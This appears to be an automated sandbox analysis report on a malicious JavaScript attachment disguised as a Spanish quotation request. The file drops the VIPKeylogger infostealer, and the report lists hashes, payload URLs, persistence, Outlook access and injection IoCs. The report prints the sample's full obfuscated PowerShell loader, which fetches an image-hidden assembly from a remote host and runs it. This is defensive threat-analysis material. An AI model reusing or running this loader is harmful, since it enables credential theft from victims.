Resubmissions
29/08/2024, 01:48
240829-b78d1sxfjd 10Analysis
-
max time kernel
136s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29/08/2024, 01:48
Static task
static1
Behavioral task
behavioral1
Sample
SOLICITUD DE COTIZACIΓN CONSULTA ABB1VCF349750R09095.js
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
SOLICITUD DE COTIZACIΓN CONSULTA ABB1VCF349750R09095.js
Resource
win10v2004-20240802-en
General
-
Target
SOLICITUD DE COTIZACIΓN CONSULTA ABB1VCF349750R09095.js
-
Size
615KB
-
MD5
3b76608f01f7d04c7f25d4d967bee3fc
-
SHA1
086e7223511a9292efffc218e5041cf941203751
-
SHA256
2119893dc47b5db45de446a7ae2cee26d9306617d6eb99ecdaad3bf276682da0
-
SHA512
1cb4c2906da652068a552ae2f93c94cb1a6f21c8e4a268f66c02acc55f587a0bea47322d62b9faac5e0785cb04e91967eb3d8cd450c4493b9b168c1e498f567e
-
SSDEEP
12288:UWaIMfBcvb0vq/EJYjfJ5dguMEDuHq7muy8EGnmYPaNM13tc46J4YGy7yW8oBYUU:UWYA9/IzrBJHbMP5d
Malware Config
Extracted
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg
Extracted
vipkeylogger
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 7 2596 powershell.exe 24 2596 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2936 powershell.exe 2596 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation wscript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\pessegueiro.js" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 26 checkip.dyndns.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2596 set thread context of 3616 2596 powershell.exe 100 -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2936 powershell.exe 2936 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 2596 powershell.exe 3616 AddInProcess32.exe 3616 AddInProcess32.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2936 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeDebugPrivilege 3616 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 21 IoCs
description pid Process procid_target PID 656 wrote to memory of 2936 656 wscript.exe 86 PID 656 wrote to memory of 2936 656 wscript.exe 86 PID 2936 wrote to memory of 2596 2936 powershell.exe 88 PID 2936 wrote to memory of 2596 2936 powershell.exe 88 PID 2596 wrote to memory of 3424 2596 powershell.exe 94 PID 2596 wrote to memory of 3424 2596 powershell.exe 94 PID 2596 wrote to memory of 2032 2596 powershell.exe 98 PID 2596 wrote to memory of 2032 2596 powershell.exe 98 PID 2596 wrote to memory of 2032 2596 powershell.exe 98 PID 2596 wrote to memory of 2532 2596 powershell.exe 99 PID 2596 wrote to memory of 2532 2596 powershell.exe 99 PID 2596 wrote to memory of 2532 2596 powershell.exe 99 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 PID 2596 wrote to memory of 3616 2596 powershell.exe 100 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 AddInProcess32.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE COTIZACIΓN CONSULTA ABB1VCF349750R09095.js"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'Jβ β¨ β β³ βBpβ β¨ β β³ βG0β β¨ β β³ βYQBnβ β¨ β β³ βGUβ β¨ β β³ βVQByβ β¨ β β³ βGwβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ β9β β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJwBoβ β¨ β β³ βHQβ β¨ β β³ βdβ β¨ β β³ βBwβ β¨ β β³ βHMβ β¨ β β³ βOgβ β¨ β β³ βvβ β¨ β β³ βC8β β¨ β β³ βaQBhβ β¨ β β³ βDYβ β¨ β β³ βMβ β¨ β β³ ββ β¨ β β³ βxβ β¨ β β³ βDYβ β¨ β β³ βMβ β¨ β β³ ββ β¨ β β³ β2β β¨ β β³ βC4β β¨ β β³ βdQBzβ β¨ β β³ βC4β β¨ β β³ βYQByβ β¨ β β³ βGMβ β¨ β β³ βaβ β¨ β β³ βBpβ β¨ β β³ βHYβ β¨ β β³ βZQβ β¨ β β³ βuβ β¨ β β³ βG8β β¨ β β³ βcgBnβ β¨ β β³ βC8β β¨ β β³ βMQβ β¨ β β³ βwβ β¨ β β³ βC8β β¨ β β³ βaQB0β β¨ β β³ βGUβ β¨ β β³ βbQBzβ β¨ β β³ βC8β β¨ β β³ βZβ β¨ β β³ βBlβ β¨ β β³ βGEβ β¨ β β³ βdβ β¨ β β³ βBoβ β¨ β β³ βG4β β¨ β β³ βbwB0β β¨ β β³ βGUβ β¨ β β³ βXwβ β¨ β β³ βyβ β¨ β β³ βDβ β¨ β β³ ββ β¨ β β³ βMgβ β¨ β β³ β0β β¨ β β³ βDβ β¨ β β³ ββ β¨ β β³ βNwβ β¨ β β³ βvβ β¨ β β³ βGQβ β¨ β β³ βZQBhβ β¨ β β³ βHQβ β¨ β β³ βaβ β¨ β β³ βBuβ β¨ β β³ βG8β β¨ β β³ βdβ β¨ β β³ βBlβ β¨ β β³ βC4β β¨ β β³ βagBwβ β¨ β β³ βGcβ β¨ β β³ βJwβ β¨ β β³ β7β β¨ β β³ βCQβ β¨ β β³ βdwBlβ β¨ β β³ βGIβ β¨ β β³ βQwBsβ β¨ β β³ βGkβ β¨ β β³ βZQBuβ β¨ β β³ βHQβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ β9β β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βTgBlβ β¨ β β³ βHcβ β¨ β β³ βLQBPβ β¨ β β³ βGIβ β¨ β β³ βagBlβ β¨ β β³ βGMβ β¨ β β³ βdβ β¨ β β³ ββ β¨ β β³ βgβ β¨ β β³ βFMβ β¨ β β³ βeQBzβ β¨ β β³ βHQβ β¨ β β³ βZQBtβ β¨ β β³ βC4β β¨ β β³ βTgBlβ β¨ β β³ βHQβ β¨ β β³ βLgBXβ β¨ β β³ βGUβ β¨ β β³ βYgBDβ β¨ β β³ βGwβ β¨ β β³ βaQBlβ β¨ β β³ βG4β β¨ β β³ βdβ β¨ β β³ ββ β¨ β β³ β7β β¨ β β³ βCQβ β¨ β β³ βaQBtβ β¨ β β³ βGEβ β¨ β β³ βZwBlβ β¨ β β³ βEIβ β¨ β β³ βeQB0β β¨ β β³ βGUβ β¨ β β³ βcwβ β¨ β β³ βgβ β¨ β β³ βD0β β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ βkβ β¨ β β³ βHcβ β¨ β β³ βZQBiβ β¨ β β³ βEMβ β¨ β β³ βbβ β¨ β β³ βBpβ β¨ β β³ βGUβ β¨ β β³ βbgB0β β¨ β β³ βC4β β¨ β β³ βRβ β¨ β β³ βBvβ β¨ β β³ βHcβ β¨ β β³ βbgBsβ β¨ β β³ βG8β β¨ β β³ βYQBkβ β¨ β β³ βEQβ β¨ β β³ βYQB0β β¨ β β³ βGEβ β¨ β β³ βKβ β¨ β β³ ββ β¨ β β³ βkβ β¨ β β³ βGkβ β¨ β β³ βbQBhβ β¨ β β³ βGcβ β¨ β β³ βZQBVβ β¨ β β³ βHIβ β¨ β β³ βbβ β¨ β β³ ββ β¨ β β³ βpβ β¨ β β³ βDsβ β¨ β β³ βJβ β¨ β β³ βBpβ β¨ β β³ βG0β β¨ β β³ βYQBnβ β¨ β β³ βGUβ β¨ β β³ βVβ β¨ β β³ βBlβ β¨ β β³ βHgβ β¨ β β³ βdβ β¨ β β³ ββ β¨ β β³ βgβ β¨ β β³ βD0β β¨ β β³ βIβ β¨ β β³ βBbβ β¨ β β³ βFMβ β¨ β β³ βeQBzβ β¨ β β³ βHQβ β¨ β β³ βZQBtβ β¨ β β³ βC4β β¨ β β³ βVβ β¨ β β³ βBlβ β¨ β β³ βHgβ β¨ β β³ βdβ β¨ β β³ ββ β¨ β β³ βuβ β¨ β β³ βEUβ β¨ β β³ βbgBjβ β¨ β β³ βG8β β¨ β β³ βZβ β¨ β β³ βBpβ β¨ β β³ βG4β β¨ β β³ βZwBdβ β¨ β β³ βDoβ β¨ β β³ βOgBVβ β¨ β β³ βFQβ β¨ β β³ βRgβ β¨ β β³ β4β β¨ β β³ βC4β β¨ β β³ βRwBlβ β¨ β β³ βHQβ β¨ β β³ βUwB0β β¨ β β³ βHIβ β¨ β β³ βaQBuβ β¨ β β³ βGcβ β¨ β β³ βKβ β¨ β β³ ββ β¨ β β³ βkβ β¨ β β³ βGkβ β¨ β β³ βbQBhβ β¨ β β³ βGcβ β¨ β β³ βZQBCβ β¨ β β³ βHkβ β¨ β β³ βdβ β¨ β β³ βBlβ β¨ β β³ βHMβ β¨ β β³ βKQβ β¨ β β³ β7β β¨ β β³ βCQβ β¨ β β³ βcwB0β β¨ β β³ βGEβ β¨ β β³ βcgB0β β¨ β β³ βEYβ β¨ β β³ βbβ β¨ β β³ βBhβ β¨ β β³ βGcβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ β9β β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJwβ β¨ β β³ β8β β¨ β β³ βDwβ β¨ β β³ βQgBBβ β¨ β β³ βFMβ β¨ β β³ βRQβ β¨ β β³ β2β β¨ β β³ βDQβ β¨ β β³ βXwBTβ β¨ β β³ βFQβ β¨ β β³ βQQBSβ β¨ β β³ βFQβ β¨ β β³ βPgβ β¨ β β³ β+β β¨ β β³ βCcβ β¨ β β³ βOwβ β¨ β β³ βkβ β¨ β β³ βGUβ β¨ β β³ βbgBkβ β¨ β β³ βEYβ β¨ β β³ βbβ β¨ β β³ βBhβ β¨ β β³ βGcβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ β9β β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJwβ β¨ β β³ β8β β¨ β β³ βDwβ β¨ β β³ βQgBBβ β¨ β β³ βFMβ β¨ β β³ βRQβ β¨ β β³ β2β β¨ β β³ βDQβ β¨ β β³ βXwBFβ β¨ β β³ βE4β β¨ β β³ βRβ β¨ β β³ ββ β¨ β β³ β+β β¨ β β³ βD4β β¨ β β³ βJwβ β¨ β β³ β7β β¨ β β³ βCQβ β¨ β β³ βcwB0β β¨ β β³ βGEβ β¨ β β³ βcgB0β β¨ β β³ βEkβ β¨ β β³ βbgBkβ β¨ β β³ βGUβ β¨ β β³ βeβ β¨ β β³ ββ β¨ β β³ βgβ β¨ β β³ βD0β β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ βkβ β¨ β β³ βGkβ β¨ β β³ βbQBhβ β¨ β β³ βGcβ β¨ β β³ βZQBUβ β¨ β β³ βGUβ β¨ β β³ βeβ β¨ β β³ βB0β β¨ β β³ βC4β β¨ β β³ βSQBuβ β¨ β β³ βGQβ β¨ β β³ βZQB4β β¨ β β³ βE8β β¨ β β³ βZgβ β¨ β β³ βoβ β¨ β β³ βCQβ β¨ β β³ βcwB0β β¨ β β³ βGEβ β¨ β β³ βcgB0β β¨ β β³ βEYβ β¨ β β³ βbβ β¨ β β³ βBhβ β¨ β β³ βGcβ β¨ β β³ βKQβ β¨ β β³ β7β β¨ β β³ βCQβ β¨ β β³ βZQBuβ β¨ β β³ βGQβ β¨ β β³ βSQBuβ β¨ β β³ βGQβ β¨ β β³ βZQB4β β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βPQβ β¨ β β³ βgβ β¨ β β³ βCQβ β¨ β β³ βaQBtβ β¨ β β³ βGEβ β¨ β β³ βZwBlβ β¨ β β³ βFQβ β¨ β β³ βZQB4β β¨ β β³ βHQβ β¨ β β³ βLgBJβ β¨ β β³ βG4β β¨ β β³ βZβ β¨ β β³ βBlβ β¨ β β³ βHgβ β¨ β β³ βTwBmβ β¨ β β³ βCgβ β¨ β β³ βJβ β¨ β β³ βBlβ β¨ β β³ βG4β β¨ β β³ βZβ β¨ β β³ βBGβ β¨ β β³ βGwβ β¨ β β³ βYQBnβ β¨ β β³ βCkβ β¨ β β³ βOwβ β¨ β β³ βkβ β¨ β β³ βHMβ β¨ β β³ βdβ β¨ β β³ βBhβ β¨ β β³ βHIβ β¨ β β³ βdβ β¨ β β³ βBJβ β¨ β β³ βG4β β¨ β β³ βZβ β¨ β β³ βBlβ β¨ β β³ βHgβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ βtβ β¨ β β³ βGcβ β¨ β β³ βZQβ β¨ β β³ βgβ β¨ β β³ βDβ β¨ β β³ ββ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ βtβ β¨ β β³ βGEβ β¨ β β³ βbgBkβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJβ β¨ β β³ βBlβ β¨ β β³ βG4β β¨ β β³ βZβ β¨ β β³ βBJβ β¨ β β³ βG4β β¨ β β³ βZβ β¨ β β³ βBlβ β¨ β β³ βHgβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ βtβ β¨ β β³ βGcβ β¨ β β³ βdβ β¨ β β³ ββ β¨ β β³ βgβ β¨ β β³ βCQβ β¨ β β³ βcwB0β β¨ β β³ βGEβ β¨ β β³ βcgB0β β¨ β β³ βEkβ β¨ β β³ βbgBkβ β¨ β β³ βGUβ β¨ β β³ βeβ β¨ β β³ ββ β¨ β β³ β7β β¨ β β³ βCQβ β¨ β β³ βcwB0β β¨ β β³ βGEβ β¨ β β³ βcgB0β β¨ β β³ βEkβ β¨ β β³ βbgBkβ β¨ β β³ βGUβ β¨ β β³ βeβ β¨ β β³ ββ β¨ β β³ βgβ β¨ β β³ βCsβ β¨ β β³ βPQβ β¨ β β³ βgβ β¨ β β³ βCQβ β¨ β β³ βcwB0β β¨ β β³ βGEβ β¨ β β³ βcgB0β β¨ β β³ βEYβ β¨ β β³ βbβ β¨ β β³ βBhβ β¨ β β³ βGcβ β¨ β β³ βLgBMβ β¨ β β³ βGUβ β¨ β β³ βbgBnβ β¨ β β³ βHQβ β¨ β β³ βaβ β¨ β β³ ββ β¨ β β³ β7β β¨ β β³ βCQβ β¨ β β³ βYgBhβ β¨ β β³ βHMβ β¨ β β³ βZQβ β¨ β β³ β2β β¨ β β³ βDQβ β¨ β β³ βTβ β¨ β β³ βBlβ β¨ β β³ βG4β β¨ β β³ βZwB0β β¨ β β³ βGgβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ β9β β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJβ β¨ β β³ βBlβ β¨ β β³ βG4β β¨ β β³ βZβ β¨ β β³ βBJβ β¨ β β³ βG4β β¨ β β³ βZβ β¨ β β³ βBlβ β¨ β β³ βHgβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ βtβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJβ β¨ β β³ βBzβ β¨ β β³ βHQβ β¨ β β³ βYQByβ β¨ β β³ βHQβ β¨ β β³ βSQBuβ β¨ β β³ βGQβ β¨ β β³ βZQB4β β¨ β β³ βDsβ β¨ β β³ βJβ β¨ β β³ βBiβ β¨ β β³ βGEβ β¨ β β³ βcwBlβ β¨ β β³ βDYβ β¨ β β³ βNβ β¨ β β³ βBDβ β¨ β β³ βG8β β¨ β β³ βbQBtβ β¨ β β³ βGEβ β¨ β β³ βbgBkβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βPQβ β¨ β β³ βgβ β¨ β β³ βCQβ β¨ β β³ βaQBtβ β¨ β β³ βGEβ β¨ β β³ βZwBlβ β¨ β β³ βFQβ β¨ β β³ βZQB4β β¨ β β³ βHQβ β¨ β β³ βLgBTβ β¨ β β³ βHUβ β¨ β β³ βYgBzβ β¨ β β³ βHQβ β¨ β β³ βcgBpβ β¨ β β³ βG4β β¨ β β³ βZwβ β¨ β β³ βoβ β¨ β β³ βCQβ β¨ β β³ βcwB0β β¨ β β³ βGEβ β¨ β β³ βcgB0β β¨ β β³ βEkβ β¨ β β³ βbgBkβ β¨ β β³ βGUβ β¨ β β³ βeβ β¨ β β³ ββ β¨ β β³ βsβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJβ β¨ β β³ βBiβ β¨ β β³ βGEβ β¨ β β³ βcwBlβ β¨ β β³ βDYβ β¨ β β³ βNβ β¨ β β³ βBMβ β¨ β β³ βGUβ β¨ β β³ βbgBnβ β¨ β β³ βHQβ β¨ β β³ βaβ β¨ β β³ ββ β¨ β β³ βpβ β¨ β β³ βDsβ β¨ β β³ βJβ β¨ β β³ βBjβ β¨ β β³ βG8β β¨ β β³ βbQBtβ β¨ β β³ βGEβ β¨ β β³ βbgBkβ β¨ β β³ βEIβ β¨ β β³ βeQB0β β¨ β β³ βGUβ β¨ β β³ βcwβ β¨ β β³ βgβ β¨ β β³ βD0β β¨ β β³ βIβ β¨ β β³ βBbβ β¨ β β³ βFMβ β¨ β β³ βeQBzβ β¨ β β³ βHQβ β¨ β β³ βZQBtβ β¨ β β³ βC4β β¨ β β³ βQwBvβ β¨ β β³ βG4β β¨ β β³ βdgBlβ β¨ β β³ βHIβ β¨ β β³ βdβ β¨ β β³ βBdβ β¨ β β³ βDoβ β¨ β β³ βOgBGβ β¨ β β³ βHIβ β¨ β β³ βbwBtβ β¨ β β³ βEIβ β¨ β β³ βYQBzβ β¨ β β³ βGUβ β¨ β β³ βNgβ β¨ β β³ β0β β¨ β β³ βFMβ β¨ β β³ βdβ β¨ β β³ βByβ β¨ β β³ βGkβ β¨ β β³ βbgBnβ β¨ β β³ βCgβ β¨ β β³ βJβ β¨ β β³ βBiβ β¨ β β³ βGEβ β¨ β β³ βcwBlβ β¨ β β³ βDYβ β¨ β β³ βNβ β¨ β β³ βBDβ β¨ β β³ βG8β β¨ β β³ βbQBtβ β¨ β β³ βGEβ β¨ β β³ βbgBkβ β¨ β β³ βCkβ β¨ β β³ βOwβ β¨ β β³ βkβ β¨ β β³ βGwβ β¨ β β³ βbwBhβ β¨ β β³ βGQβ β¨ β β³ βZQBkβ β¨ β β³ βEEβ β¨ β β³ βcwBzβ β¨ β β³ βGUβ β¨ β β³ βbQBiβ β¨ β β³ βGwβ β¨ β β³ βeQβ β¨ β β³ βgβ β¨ β β³ βD0β β¨ β β³ βIβ β¨ β β³ βBbβ β¨ β β³ βFMβ β¨ β β³ βeQBzβ β¨ β β³ βHQβ β¨ β β³ βZQBtβ β¨ β β³ βC4β β¨ β β³ βUgBlβ β¨ β β³ βGYβ β¨ β β³ βbβ β¨ β β³ βBlβ β¨ β β³ βGMβ β¨ β β³ βdβ β¨ β β³ βBpβ β¨ β β³ βG8β β¨ β β³ βbgβ β¨ β β³ βuβ β¨ β β³ βEEβ β¨ β β³ βcwBzβ β¨ β β³ βGUβ β¨ β β³ βbQBiβ β¨ β β³ βGwβ β¨ β β³ βeQBdβ β¨ β β³ βDoβ β¨ β β³ βOgBMβ β¨ β β³ βG8β β¨ β β³ βYQBkβ β¨ β β³ βCgβ β¨ β β³ βJβ β¨ β β³ βBjβ β¨ β β³ βG8β β¨ β β³ βbQBtβ β¨ β β³ βGEβ β¨ β β³ βbgBkβ β¨ β β³ βEIβ β¨ β β³ βeQB0β β¨ β β³ βGUβ β¨ β β³ βcwβ β¨ β β³ βpβ β¨ β β³ βDsβ β¨ β β³ βJβ β¨ β β³ βB0β β¨ β β³ βHkβ β¨ β β³ βcβ β¨ β β³ βBlβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βPQβ β¨ β β³ βgβ β¨ β β³ βCQβ β¨ β β³ βbβ β¨ β β³ βBvβ β¨ β β³ βGEβ β¨ β β³ βZβ β¨ β β³ βBlβ β¨ β β³ βGQβ β¨ β β³ βQQBzβ β¨ β β³ βHMβ β¨ β β³ βZQBtβ β¨ β β³ βGIβ β¨ β β³ βbβ β¨ β β³ βB5β β¨ β β³ βC4β β¨ β β³ βRwBlβ β¨ β β³ βHQβ β¨ β β³ βVβ β¨ β β³ βB5β β¨ β β³ βHβ β¨ β β³ ββ β¨ β β³ βZQβ β¨ β β³ βoβ β¨ β β³ βCcβ β¨ β β³ βZβ β¨ β β³ βBuβ β¨ β β³ βGwβ β¨ β β³ βaQBiβ β¨ β β³ βC4β β¨ β β³ βSQBPβ β¨ β β³ βC4β β¨ β β³ βSβ β¨ β β³ βBvβ β¨ β β³ βG0β β¨ β β³ βZQβ β¨ β β³ βnβ β¨ β β³ βCkβ β¨ β β³ βOwβ β¨ β β³ βkβ β¨ β β³ βG0β β¨ β β³ βZQB0β β¨ β β³ βGgβ β¨ β β³ βbwBkβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βPQβ β¨ β β³ βgβ β¨ β β³ βCQβ β¨ β β³ βdβ β¨ β β³ βB5β β¨ β β³ βHβ β¨ β β³ ββ β¨ β β³ βZQβ β¨ β β³ βuβ β¨ β β³ βEcβ β¨ β β³ βZQB0β β¨ β β³ βE0β β¨ β β³ βZQB0β β¨ β β³ βGgβ β¨ β β³ βbwBkβ β¨ β β³ βCgβ β¨ β β³ βJwBWβ β¨ β β³ βEEβ β¨ β β³ βSQβ β¨ β β³ βnβ β¨ β β³ βCkβ β¨ β β³ βLgBJβ β¨ β β³ βG4β β¨ β β³ βdgBvβ β¨ β β³ βGsβ β¨ β β³ βZQβ β¨ β β³ βoβ β¨ β β³ βCQβ β¨ β β³ βbgB1β β¨ β β³ βGwβ β¨ β β³ βbβ β¨ β β³ ββ β¨ β β³ βsβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βWwBvβ β¨ β β³ βGIβ β¨ β β³ βagBlβ β¨ β β³ βGMβ β¨ β β³ βdβ β¨ β β³ βBbβ β¨ β β³ βF0β β¨ β β³ βXQβ β¨ β β³ βgβ β¨ β β³ βCgβ β¨ β β³ βJwβ β¨ β β³ βmβ β¨ β β³ βDβ β¨ β β³ ββ β¨ β β³ βNQβ β¨ β β³ β0β β¨ β β³ βDMβ β¨ β β³ βMgβ β¨ β β³ β4β β¨ β β³ βDEβ β¨ β β³ βZgβ β¨ β β³ βxβ β¨ β β³ βGUβ β¨ β β³ βYgβ β¨ β β³ βwβ β¨ β β³ βGIβ β¨ β β³ βNβ β¨ β β³ βBiβ β¨ β β³ βDEβ β¨ β β³ βYQβ β¨ β β³ β4β β¨ β β³ βGEβ β¨ β β³ βMwβ β¨ β β³ βxβ β¨ β β³ βDβ β¨ β β³ ββ β¨ β β³ βYgBkβ β¨ β β³ βDMβ β¨ β β³ βOβ β¨ β β³ ββ β¨ β β³ βxβ β¨ β β³ βGEβ β¨ β β³ βZβ β¨ β β³ ββ β¨ β β³ β5β β¨ β β³ βDQβ β¨ β β³ βYgBiβ β¨ β β³ βGQβ β¨ β β³ βMQβ β¨ β β³ βwβ β¨ β β³ βDUβ β¨ β β³ βYQβ β¨ β β³ βyβ β¨ β β³ βDgβ β¨ β β³ βNwBhβ β¨ β β³ βDIβ β¨ β β³ βNQBlβ β¨ β β³ βGMβ β¨ β β³ βNwβ β¨ β β³ β5β β¨ β β³ βGEβ β¨ β β³ βNwβ β¨ β β³ βyβ β¨ β β³ βGYβ β¨ β β³ βZQBkβ β¨ β β³ βDkβ β¨ β β³ βMβ β¨ β β³ ββ β¨ β β³ βyβ β¨ β β³ βDQβ β¨ β β³ βMgβ β¨ β β³ βyβ β¨ β β³ βGUβ β¨ β β³ βOQBjβ β¨ β β³ βDEβ β¨ β β³ βPQBtβ β¨ β β³ βGgβ β¨ β β³ βJgβ β¨ β β³ β5β β¨ β β³ βDIβ β¨ β β³ βYgβ β¨ β β³ βxβ β¨ β β³ βGYβ β¨ β β³ βYwβ β¨ β β³ β2β β¨ β β³ βDYβ β¨ β β³ βPQBzβ β¨ β β³ βGkβ β¨ β β³ βJgβ β¨ β β³ β5β β¨ β β³ βGEβ β¨ β β³ βYwβ β¨ β β³ β2β β¨ β β³ βDβ β¨ β β³ ββ β¨ β β³ βZβ β¨ β β³ ββ β¨ β β³ β2β β¨ β β³ βDYβ β¨ β β³ βPQB4β β¨ β β³ βGUβ β¨ β β³ βPwB0β β¨ β β³ βHgβ β¨ β β³ βdβ β¨ β β³ ββ β¨ β β³ βuβ β¨ β β³ βGUβ β¨ β β³ βawBhβ β¨ β β³ βG4β β¨ β β³ βUwβ β¨ β β³ βvβ β¨ β β³ βDβ β¨ β β³ ββ β¨ β β³ βNwβ β¨ β β³ βyβ β¨ β β³ βDIβ β¨ β β³ βNwβ β¨ β β³ β2β β¨ β β³ βDYβ β¨ β β³ βMgβ β¨ β β³ βyβ β¨ β β³ βDcβ β¨ β β³ βMwβ β¨ β β³ β4β β¨ β β³ βDMβ β¨ β β³ βMwβ β¨ β β³ βzβ β¨ β β³ βDgβ β¨ β β³ βNwβ β¨ β β³ βyβ β¨ β β³ βDEβ β¨ β β³ βLwβ β¨ β β³ βwβ β¨ β β³ βDIβ β¨ β β³ βNQβ β¨ β β³ β1β β¨ β β³ βDgβ β¨ β β³ βNgβ β¨ β β³ β5β β¨ β β³ βDcβ β¨ β β³ βNQβ β¨ β β³ βyβ β¨ β β³ βDgβ β¨ β β³ βNgβ β¨ β β³ β5β β¨ β β³ βDIβ β¨ β β³ βMwβ β¨ β β³ β4β β¨ β β³ βDcβ β¨ β β³ βMgβ β¨ β β³ βxβ β¨ β β³ βC8β β¨ β β³ βcwB0β β¨ β β³ βG4β β¨ β β³ βZQBtβ β¨ β β³ βGgβ β¨ β β³ βYwBhβ β¨ β β³ βHQβ β¨ β β³ βdβ β¨ β β³ βBhβ β¨ β β³ βC8β β¨ β β³ βbQBvβ β¨ β β³ βGMβ β¨ β β³ βLgBwβ β¨ β β³ βHβ β¨ β β³ ββ β¨ β β³ βYQBkβ β¨ β β³ βHIβ β¨ β β³ βbwBjβ β¨ β β³ βHMβ β¨ β β³ βaQBkβ β¨ β β³ βC4β β¨ β β³ βbgBkβ β¨ β β³ βGMβ β¨ β β³ βLwβ β¨ β β³ βvβ β¨ β β³ βDoβ β¨ β β³ βcwBwβ β¨ β β³ βHQβ β¨ β β³ βdβ β¨ β β³ βBoβ β¨ β β³ βCcβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ βsβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJwβ β¨ β β³ βxβ β¨ β β³ βCcβ β¨ β β³ βIβ β¨ β β³ ββ β¨ β β³ βsβ β¨ β β³ βCβ β¨ β β³ ββ β¨ β β³ βJwBDβ β¨ β β³ βDoβ β¨ β β³ βXβ β¨ β β³ βBQβ β¨ β β³ βHIβ β¨ β β³ βbwBnβ β¨ β β³ βHIβ β¨ β β³ 